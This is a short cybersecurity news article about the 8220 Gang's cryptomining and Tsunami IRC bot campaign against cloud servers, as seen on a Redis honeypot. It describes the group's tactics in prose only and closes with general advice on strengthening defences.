A Chinese-speaking hacking group, 8220 Gang, used cryptocurrency miners and IRC (Internet Relay Chats) bots to target cloud service providers and unsecured applications. The gang utilised cryptominers and botnets to acquire a financial advantage on public cloud infrastructure.
Researchers explained that the 8220 Gang is a malicious group specialising in cryptomining operations against public cloud environments. Currently, most public clouds offer numerous unlimited resources to their subscribers, attracting cybercriminals that use cryptomining attacks.
The group uses several strategies to hide its activities and bypass security detections. One of their tactics is using a blocklist to avoid getting caught on honeypots.
Additionally, this group has been exploiting the Tsunami IRC bot, one of the pioneers of IoT botnets. These hackers have also utilised the IRC protocol for their command-and-control communication.
The 8220 Gang used a server hosted on a cloud provider.
The source IP address used by the 8220 Gang for its campaigns was an infected Apache server stored on a cloud provider. Next, the IP address sends scripted commands to Radware’s Redis honeypot.
These instructions used by the group are for downloading, installing, and operating a shell script. The scripts are cryptominer, Python, and the Tsunami IRC bot on the system that runs Redis.
Furthermore, the PwnRig cryptominer utilised by the threat actors would hold back the targeted systems using CPU/GPU resources. This strategy forces the infected devices to consume more resources, resulting in increased invoices.
Once the infection is successful, the same intrusion tactic will be used by the actors to install additional malware payloads, such as RATs and keyloggers.
The actors use all these malicious tools to operate cybercriminal activities such as unauthorised access, ransomware deployment, and information stealing.
Finally, the IRC bot supports different denial-of-service attacks, including SYN and UDP floods that could result in financial losses for an infected victim.
This recent campaign from the 8220 Gang shows the lack of security in cloud environments and poorly configured apps. Users with weaker credentials and outdated apps are more prone to these attacks.
Organisations should fortify their defences by including intelligent security controls and incident response features to mitigate the effects of such campaigns.
